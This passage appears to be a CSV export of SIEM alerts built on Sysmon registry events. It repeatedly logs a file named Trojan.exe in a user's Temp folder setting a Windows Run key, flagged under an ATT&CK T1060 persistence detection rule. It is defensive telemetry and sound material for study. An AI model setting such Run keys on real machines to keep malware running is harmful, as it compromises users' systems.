..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:38.421345800Z"",""eventRecordID"":""1926"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:38.418\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:38.418"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:40.784",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:37.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:37.388186800Z"",""eventRecordID"":""1925"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:37.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:37.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:39.752",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:36.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:36.369623100Z"",""eventRecordID"":""1924"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:36.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:36.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:38.754",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:35.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:35.327415500Z"",""eventRecordID"":""1923"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:35.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:35.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:37.721",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:34.308 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:34.310205200Z"",""eventRecordID"":""1922"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:34.308\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:34.308"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:36.674",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:33.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:33.297982300Z"",""eventRecordID"":""1921"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:33.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:33.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:35.768",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:32.262 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:32.262670900Z"",""eventRecordID"":""1920"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:32.262\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:32.262"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:35.737",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:31.246 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:31.248142200Z"",""eventRecordID"":""1919"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:31.246\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:31.246"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:35.674",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:30.231 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:30.232122500Z"",""eventRecordID"":""1918"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:30.231\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:30.231"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:32.611",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:29.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:29.229626000Z"",""eventRecordID"":""1917"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:29.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:29.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:31.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:28.122 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:28.123285600Z"",""eventRecordID"":""1916"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:28.122\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:28.122"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:30.549",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:27.106 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 